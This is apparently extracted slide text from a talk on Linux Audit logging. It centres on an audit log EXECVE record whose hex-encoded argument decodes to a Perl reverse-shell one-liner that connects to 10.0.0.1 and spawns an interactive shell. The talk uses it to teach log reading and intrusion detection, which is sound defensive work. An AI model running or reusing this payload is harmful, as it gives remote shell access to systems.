Hilko Bengen
2024-10-25
/var/log/messages
, /var/log/auth.log
sudo
, ssh
, cron
, etc.type=SYSCALL msg=audit(1626611363.720:348501): …
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl"
a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24
703D313233343B736F636B657428532C50465F494E45542C534F434B5F53545
245414D2C67657470726F746F62796E616D6528227463702229293B69662863
6F6E6E65637428532C736F636B616464725F696E2824702C696E65745F61746
F6E282469292929297B6F70656E28535444494E2C223E265322293B6F70656E
285354444F55542C223E265322293B6F70656E285354444552522C223E26532
2293B6578656328222F62696E2F7368202D6922293B7D3B
type=CWD msg=audit(1626611363.720:348501): …
So, what is this EXECVE.a2
?
"Linux Audit – Usable, Robust, Easy Logging"
CreateProcess
. What
is fork
, exec
?"root
= 'S-1-5-18'.
Everybody knows that"ps
netstat
Hilko Bengen <bengen@hilluzination.de>
https://github.com/hillu | @hillu@infosec.exchange |
Slides are available online: